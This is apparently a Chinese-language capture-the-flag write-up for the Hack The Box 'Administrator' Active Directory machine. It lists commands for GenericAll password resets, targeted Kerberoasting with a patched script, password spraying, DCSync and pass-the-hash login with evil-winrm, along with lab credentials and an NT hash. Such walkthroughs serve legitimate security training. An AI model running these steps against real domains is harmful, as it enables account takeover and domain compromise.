HTB-Administrator

  • 开局败给个账户
  • GenericAll权限改别人密码
  • smb文件藏密码
  • ADCS提权

image-20250514091811361

用Linux打GenericAll

apt install -y heimdal-clients libsasl2-modules-gssapi-heimdal

vim ./custom_krb5.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[libdefaults]
    default_realm = ADMINISTRATOR.HTB
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    ADMINISTRATOR.HTB = {
        kdc = dc.administrator.htb
        admin_server = dc.administrator.htb
        default_domain = dc.administrator.htb
    }

[domain_realm]
    administrator.htb = ADMINISTRATOR.HTB
    .administrator.htb = ADMINISTRATOR.HTB
  • export KRB5_CONFIG=”$PWD/custom_krb5.conf”
  • kinit Olivia
  • klist
  • export KRB5CCNAME=/tmp/krb5cc_0

image-20250514091508007

然后下载脚本,对脚本内容进行一下修改

targetedKerberoast.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
91         if TGT is None:
592             if TGS is None:
593                 tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
594                                                                         aesKey=args.auth_aes_key, kdcHost=args.dc_ip)
595         else:
596             tgt = TGT['KDC_REP']
597             cipher = TGT['cipher']
598             sessionKey = TGT['sessionKey']
599
600         TGT = {}
601         TGT['KDC_REP'] = tgt
602         TGT['cipher'] = cipher
603         TGT['sessionKey'] = sessionKey

改成

591         if TGT is None:
592             if TGS is None:
593                 tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
594                                                                         aesKey=args.auth_aes_key, kdcHost=args.dc_ip)
595         
596                 TGT = {}
597                 TGT['KDC_REP'] = tgt
598                 TGT['cipher'] = cipher
599                 TGT['sessionKey'] = sessionKey
600             
601         else:
602             tgt = TGT['KDC_REP']
603             cipher = TGT['cipher']
604             sessionKey = TGT['sessionKey']

image-20250514092558077

报错原因是时间不同步

  • apt install ntpdate
  • ntpdate 10.10.11.42

之后john一下就行,但是我这用的rockyou的字典没爆破出来

image-20250514092736098

切换方法

1
net rpc password "michael" "DDL666dll" -U "administrator.htb"/"olivia"%"ichliebedich" -S 10.10.11.42

获得第二个用户

1
net rpc password "benjamin" "DDL666dll" -U "administrator.htb"/"michael"%"DDL666dll" -S 10.10.11.42

获得第三个用户

试探一下

image-20250514094313918

image-20250514095655677

net user benjamin,能看到他是分享管理员

获取第三个用户

ftp里面有个备份文件

从Backup.psafe3中获取密码

  • UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
    • alexander
  • UXLCI5iETUsIBoFVTj8yQFKoHjXmb
    • emily
  • WwANQWnmJnGV07WQN8bMS7FMAbjNur
    • emma

密码喷洒获取新账户

1
nxc smb 10.10.11.42 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

获取第四个用户

1
python3 targetedKerberoast.py -v -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

limpbizkit

试探试探

1
crackmapexec smb 10.10.11.42 -u ethan -p 'limpbizkit'

不能winrm,不过已经没问题了,这个用户有dcsync权限,直接打管理员

image-20250514114849966

然后通过hash登录

1
evil-winrm -i dc.administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

参考